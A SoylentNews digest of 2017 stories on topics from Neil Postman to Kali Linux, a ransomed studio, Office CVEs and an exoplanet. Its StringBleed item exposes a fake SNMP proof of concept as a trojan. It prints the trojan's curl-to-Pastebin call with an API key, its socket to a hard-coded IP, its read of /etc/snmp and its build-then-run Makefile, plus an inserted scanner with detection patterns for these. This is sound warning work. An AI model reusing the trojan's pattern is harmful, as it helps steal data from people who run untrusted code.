Covers the period:
2017-01-01 .. 2017-04-28
(SPIDs: [586..643]) --martyb
In 1985, Neil Postman observed an America imprisoned by its own need for amusement. He was, it turns out, extremely prescient.
[...] Postman today is best remembered as a critic of television: That’s the medium he directly blamed, in Amusing Ourselves to Death, for what he termed Americans’ “vast descent into triviality,” and the technology he saw as both the cause and the outcome of a culture that privileged entertainment above all else. But Postman was a critic of more than TV alone. He mistrusted entertainment, not as a situation but as a political tool; he worried that Americans’ great capacity for distraction had compromised their ability to think, and to want, for themselves. He resented the tyranny of the lol. His great observation, and his great warning, was a newly relevant kind of bummer: There are dangers that can come with having too much fun.
In 1984, Americans took a look around at the world they had created for themselves and breathed a collective sigh of relief. The year George Orwell had appointed as the locus of his dark and only lightly fictionalized predictions—war, governmental manipulation, surveillance not just of actions, but of thoughts themselves—had brought with it, in reality, only the gentlest of dystopias. Sure, there was corporatism. Sure, there was communism. And yet, for most of the Americans living through that heady decade, 1984 had not, for all practical purposes, become Nineteen Eighty-Four. They surveyed themselves, and they congratulated themselves: They had escaped.
Or perhaps they hadn’t. Postman opened Amusing Ourselves to Death with a nod to the year that had preceded it. He talked about the freedoms enjoyed by the Americans of 1984—cultural, commercial, political. And then he broke the bad news: They’d been measuring themselves according to the wrong dystopia. It wasn’t Nineteen Eighty-Four that had the most to say about the America of the 1980s, but rather Aldous Huxley’s Brave New World. “In Huxley’s vision,” Postman noted, “no Big Brother is required to deprive people of their autonomy, maturity, and history.” Instead: “People will come to love their oppression, to adore the technologies that undo their capacities to think.”
The vehicle of their oppression, in this case? Yep, the television. Which had, Postman argued, thoroughly insinuated itself on all elements of American life—and not just in the boob-tubed, couch-potatoed, the-average-American-watches-five-hours-of-television-a-day kind of way that is so familiar in anti-TV invectives, but in a way that was decidedly more intimate.
Are we having tooooo much fun?
Think passwords, people. Think long, complex passwords. Not because a breach dump's landed, but because the security-probing-oriented Kali Linux just got better at cracking passwords.
Kali is a Debian-based Linux that packs in numerous hacking and forensics tools. It's well-regarded among white hat hackers and investigators, who appreciate its inclusion of the tools of their trades.
The developers behind the distro this week gave it a polish, adding new images optimised for GPU-using instances in Azure and Amazon Web Services. The extra grunt the GPUs afford, Kali's backers say, will enhance the distribution's password-probing powers. There's also better support for GPU cracking, hence our warning at the top of this story: anyone can use Kali and there's no way to guarantee black hats won't press it into service. And they can now do so on as many GPU-boosted cloud instances as they fancy paying for.
Could some users of Kali Linux technically be called "thugs?"
"On December 26, in an encrypted chat, TheDarkOverlord (TDO) informed DataBreaches.net that they had recently come across what they described as hundreds of GBs of unreleased and non-public media from a studio located in Hollywood...TDO would not reveal the attack method nor how much the ransom demand was, but DataBreaches.net was able to obtain a copy of a contract both TDO and a representative of Larson allegedly signed. The contract, signed December 27, indicated that the studio would pay TDO 50 BTC by January 31. TDO signed the contract as "Adolf Hitler." The signature of the company representative was indecipherable, but TDO claimed that it was the CFO of the firm who signed."
According to http://www.coindesk.com/price/, 50 BTC is US $65,984.32.
This article contains more of the contract content: https://noise.getoto.net/tag/thedarkoverlord/ as well as links to the pastebin (removed) https://web.archive.org/web/20170428224235/https://pastebin.com/FKZAafQd.
And covered by TorrentFreak https://torrentfreak.com/hackers-leak-netflixs-orange-is-the-new-black-season-5-premiere-170429/
The EPA's extensive climate change website now redirects to a page that says "this page is being updated" and that "we are currently updating our website to reflect EPA's priorities under the leadership of President Trump and Administrator Pruitt." It also links to a full archive of how the page used to look on Jan. 19, before Trump's inauguration.
Recently, someone in my family was not able to get into their home PC with their password, and called for assistance. This means having to drive down to the machine to see what they are doing, and log in with the appropriate account that can reset that password. Work commitments preclude driving there right away to see what is happening, and I am trying to locate a remote access solution. If they were logged into the machine, I could use some sort of remote assistance tool, but that is not an option in this case. There is the possibility of setting up SSH or OpenVPN to access the machine via the Internet, but I am not certain leaving those tools running all the time is the smartest idea in this day and age.
What recommendations do the Soylent community have for securely managing a machine over the Internet when someone is not logged into it?
In a Security Week article by Ionut Arghir about a newly discovered SNMP vulnerability which allows authentication mechanisms to be bypassed on dozens of network device models (more detail here and here), the author included a link to a github repository (https://github.com/string-bleed/StringBleed-CVE-2017-5135 -- Don't compile and execute the code, but by all means take a look) which purports to be a proof-of-concept (POC) exploit of the vulnerability. However, it's not. It's a trojan which will exfiltrate data from your system.
From the Security Week article:
The issue, the researchers say [this is the link to the trojaned "POC"], resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called "community string" that SNMP version 1 and 2 use.
The folks at Mitre (who manage the CVE database) caught this and made mention of the issue in their DB entry:
Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.
The github repository contains a license, a readme, a Makefile and one source file, poc-linux.c. Looking at the C code, it's immediately clear that this is *not* an SNMP exploit (extracts from poc-linux.c):
system("curl -X POST https://pastebin.com/api/api_post.php --data 'api_option=paste&api_paste_name=dotslashhacker&api_paste_expire_date=10M&api_paste_format=c&api_paste_private=0&api_dev_key=8fc2bb602e03acd0c45830805b878497&api_paste_code=i%20randomly%20run%20PoC%20exploits%20without%20checking%20them%20first%20'");
int make_packet(char *_packet, char *_fname, int *_body_len)
char *body_line = calloc(sizeof(char), DATA_SIZE);
char *header_line = calloc(sizeof(char), DATA_SIZE);
int main(int argc, char* argv)
char *packet = calloc(sizeof(char), DATA_SIZE);
char *f_name = '/etc/snmp';
sock = socket_connect("18.104.22.168", 80);
packet_len = make_packet(packet,f_name, &body_len);
What's more, the Makefile executes the binary immediately upon compiling/linking:
gcc -Qunused-arguments -std=gnu99 poc-linux.c -o poc-linux
chmod +x poc-linux && ./poc-linux
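As an added example (not code from the page or from the repository it discusses), here is a small pre-build review script that flags the kinds of indicators visible in the extracts above: a shell-out to curl, a paste-site URL, a hard-coded IP literal, a read of a path under /etc, and a Makefile that runs its own build output. The sample source and Makefile are constructed to mirror the quoted extracts, and the rule list is an assumption chosen for this case, not a general trojan detector.

```python
import re

# Constructed sample mirroring the poc-linux.c extracts quoted above (not the full file).
SAMPLE_SOURCE = r'''
int main(int argc, char* argv)
{
    system("curl -X POST https://pastebin.com/api/api_post.php --data 'api_option=paste'");
    char *f_name = '/etc/snmp';
    sock = socket_connect("18.104.22.168", 80);
    packet_len = make_packet(packet, f_name, &body_len);
}
'''

# Constructed Makefile mirroring the build-then-run recipe quoted above.
SAMPLE_MAKEFILE = ("all:\n"
                   "\tgcc -Qunused-arguments -std=gnu99 poc-linux.c -o poc-linux\n"
                   "\tchmod +x poc-linux && ./poc-linux\n")

# Review rules (assumed for this example): things a PoC for a cable-modem SNMP
# bug has no business doing, such as shelling out to an HTTP client, posting to a
# paste site, dialling a hard-coded public host, or reading local config files.
RULES = [
    ("shell-out to HTTP client", re.compile(r'\bsystem\s*\(\s*"(?:curl|wget)\b')),
    ("paste-site URL", re.compile(r'https?://(?:pastebin\.com|paste\.ee|ghostbin)', re.I)),
    ("hard-coded IPv4 literal", re.compile(r'"(?:\d{1,3}\.){3}\d{1,3}"')),
    ("reads local config path", re.compile(r"""['"]/etc/[\w./-]*['"]""")),
]
# Matches "-o <name>" followed on a later line by "./<name>": build output is executed.
MAKEFILE_RUNS_BUILD_OUTPUT = re.compile(r'-o\s+(\S+).*?\n.*?\./\1\b', re.S)

def scan_source(text):
    """Return (line_number, label, stripped_line) for every rule hit, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in RULES:
            if rx.search(line):
                findings.append((lineno, label, line.strip()))
    return findings

def makefile_executes_output(text):
    """True if the Makefile compiles to an output file and then runs that same file."""
    return MAKEFILE_RUNS_BUILD_OUTPUT.search(text) is not None

if __name__ == "__main__":
    for lineno, label, line in scan_source(SAMPLE_SOURCE):
        print(f"line {lineno}: {label}: {line}")
    if makefile_executes_output(SAMPLE_MAKEFILE):
        print("Makefile runs the freshly built binary; do not run 'make' blindly")
```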
I'm wondering why Mr. Arghir over at Security Week didn't do his due diligence (and it didn't take much, just opening the C file, or even just looking at the CVE entry at Mitre.org).
I know it goes against much of what Soylentils stand for, but TFA is a short read. Based on TFA, would any of you have simply gone to github and built this "POC" without making sure it was what it purported to be?
Also, is anyone actually still using SNMP v1/2/2c, rather than v3?
Who asked for a bunch of "Avatar" sequels for Christmas? Your wish has been granted.
Better find out what the Na'vi want for Christmas, because the blue humanoids are going to be around for a lot of them.
The official Facebook page for James Cameron's sci-fi movie franchise announced on Saturday that dates have been set for the release of the next four "Avatar" sequels, and they're all right around the big December holiday movie rush, though in different years.
"Avatar takes flight as we begin concurrent production on four sequels," the post reads. "The journey continues December 18, 2020, December 17, 2021, December 20, 2024 and December 19, 2025!"
-- submitted from IRC
Baby humpback whales seem to whisper to their mothers, according to scientists who have captured the infant whales' quiet grunts and squeaks.
The recordings, described in the journal Functional Ecology, are the first ever made with devices attached directly to the calves.
High suckling rates and acoustic crypsis of humpback whale neonates maximise potential for mother–calf energy transfer (open, DOI: 10.1111/1365-2435.12871) (DX)
SpaceX will attempt to launch a spy satellite for the first time on Sunday, breaking a 10-year United Launch Alliance monopoly on classified U.S. launches.
The two-hour launch window opens at 7:00 a.m. EDT (11:00 UTC), with a backup launch window the next day at the same time. SpaceX will attempt to recover the first stage rocket.
[UPDATE 1: The launch is being live-streamed on YouTube. --martyb]
[UPDATE 2: Launch was scrubbed at T minus 1 minute due to "a sensor issue on the first stage" — launch now scheduled for same time tomorrow: Monday, May 1, 2017 at 0700 EDT / 1100 UTC. --martyb]
Submitted via IRC for TheMightyBuzzard
With slick marketing, catchy taglines and some pretty bold claims about their security, nomx claim to have cracked email security.
This thorough article tells all about the device, and it doesn't measure up at all to its marketing.
It would be very easy to conclude that this is a scam. The device is standard mail server software running on a Raspberry Pi, most of it outdated. They have presented at countless tech shows and can be constantly found making bold statements of 'absolute security', yet didn't pick up a CSRF vulnerability in their web interface.
Nomx has issued a reply on their main page in a post titled 'nomx Passes Security Tests After Blogger Claims to Have Penetrated nomx'. In that reply nomx states the following results:
No nomx user was affected by this threat. No nomx user could be affected by this threat in the future. No nomx data was compromised, and the blogger has (finally) reluctantly verified this. He still has not publicly shared these statements, except via an email response to the BBC; when directly asked on April 25, the response was:
From the BBC to nomx: "I understand from your replies that you state categorically that no nomx accounts have been affected by this hack. I have put your questions to [blogger] who has confirmed to me that he cannot say that any have."
While nomx is no longer based on Raspberry devices, we still maintain that the users' data is secured as we've demonstrated to the blogger, the media and our customers.
Also at Ars Technica
It's reported that, as of 11 April, patches are available for a security bug in Microsoft Office and in Wordpad which was disclosed to the company in October. The flaw was widely exploited after McAfee blogged about it. It affects Microsoft Office 2007 SP3 and Windows Vista SP2; the latter was released in May 2009 and the former in October 2011.
[...] CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.
Further information: CVE-2017-0199
An extremely cold and relatively small exoplanet has been discovered using gravitational microlensing. The planet orbits an ultracool red or brown dwarf at a distance of around 1.16 AU:
Scientists have discovered a new planet with the mass of Earth, orbiting its star at the same distance that we orbit our sun. The planet is likely far too cold to be habitable for life as we know it, however, because its star is so faint. But the discovery adds to scientists' understanding of the types of planetary systems that exist beyond our own.
[...] The newly discovered planet, called OGLE-2016-BLG-1195Lb, aids scientists in their quest to figure out the distribution of planets in our galaxy. An open question is whether there is a difference in the frequency of planets in the Milky Way's central bulge compared to its disk, the pancake-like region surrounding the bulge. OGLE-2016-BLG-1195Lb is located in the disk, as are two planets previously detected through microlensing by NASA's Spitzer Space Telescope.
Popsci press couldn't resist calling it "Hoth", although it would be even less hospitable.
An Earth-mass Planet in a 1 au Orbit around an Ultracool Dwarf (open, DOI: 10.3847/2041-8213/aa6d09) (DX)
Kotaku reports that:
[...] Nintendo announced the New 2DS XL, a sleek $150 piece of hardware that is essentially a New 3DS XL without 3D. This is an iteration on 2013's 2DS, a cheaper model that also ditched the 3D but felt uncomfortable and lacked the convenient clamshell design of other models.
The new model is planned to be available in July in the United States, at around $150.
takyon: Is glasses-free 3D dead?
Nintendo 3DS was released in Japan on February 26, 2011 and worldwide the following month. The price was cut by $80 on July 28, 2011.
Softpedia News reports that version 2.02 of the GRUB boot loader has been released. Among the many new features are support for LZ4 compression on ZFS, 64-bit ext2, XFS v5, Morse code output and a modem-like output through the PC speaker, Xen paravirtualisation, TrueCrypt ISOs, Apple fat binaries on non-Apple hardware, and 16-bit mode on non-x86 hardware.
A research misconduct investigation of a prominent stem cell lab by the Harvard University–affiliated Brigham and Women's Hospital (BWH) in Boston has led to a massive settlement with the U.S. government over allegations of fraudulently obtained federal grants. As Retraction Watch reports, BWH and its parent health care system have agreed to pay $10 million to resolve allegations that former BWH cardiac stem cell scientist Piero Anversa and former lab members Annarosa Leri and Jan Kajstura relied on manipulated and fabricated data in grant applications submitted to the U.S. National Institutes of Health (NIH).
A statement from the U.S. Attorney's Office for the District of Massachusetts released today notes that it was BWH itself that shared the allegations against Anversa's lab with the government. The hospital had been conducting its own probe into the Anversa lab since at least 2014, when a retraction published in the journal Circulation revealed the ongoing investigation. The hospital has not yet released any findings.